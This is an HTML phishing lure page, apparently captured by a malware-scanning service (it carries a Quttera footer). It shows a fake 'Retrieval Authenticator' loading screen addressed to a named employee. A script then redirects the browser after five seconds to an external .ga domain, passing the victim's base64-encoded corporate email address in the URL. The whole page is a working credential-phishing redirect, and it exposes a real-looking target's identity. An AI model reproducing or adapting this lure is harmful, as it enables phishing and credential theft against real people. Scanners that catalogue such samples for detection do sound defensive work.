<script language="javascript"><html>
<head>
<title>Retrieval Authenticator</title>
<style>
body{
background-color: red;
padding: 0;
margin: 0;
height: 100vh;
width:100vw;
display:flex;
align-items: center;
justify-content: center;
}
.loader{
-webkit-perspective:700px;
perspective: 700px;
}
.loader>span{
font-size: 130px;
font-family: "franklin gothic medium",sans-serif;
display: inline-block;
animation:flip 2.6s infinite linear;
transform-origin:0 70%;
transform-style:preserve-3d;
-webkit-transform-style:preserve-3d;
}
@keyframes flip{
35%{
transform: rotateX(360deg);
}
100%{
transform: rotatex(360deg);
}
}
.loader>span:nth-child(even){
color:white;
}
.loader>span:nth-child(2){
animation-delay: 0.3s;
}
.loader>span:nth-child(3){
animation-delay: 0.6s;
}
.loader>span:nth-child(4){
animation-delay: 0.9s;
}
.loader>span:nth-child(5){
animation-delay: 1.2s;
}
.loader>span:nth-child(6){
animation-delay: 1.5s
}
.loader>span:nth-child(7){
animation-delay: 1.8s
}
</style>
</head>
<body>
<body>
<div class="loader">
<span>L</span>
<span>O</span>
<span>A</span>
<span>D</span>
<span>I</span>
<span>N</span>
<span>G</span>
</div>
<div style="color:white; font-size:22px; font-family: Tahoma; margin:5%; line-height: 2; padding:1%;">
Dear Gavin.burke, Access Point Is Being Retrieved... <br>
You Will Be Redirected In 5 Seconds Automatically...
</div>
</body>
<script>
setTimeout(function(){
window.location.href = 'https://dintquin.ga/Z2F2aW4uYnVya2VAYmFsZm91cmJlYXR0eS5jb20=';
}, 5000);
</script>
</body></script>
© 2021 Quttera Ltd. All rights reserved.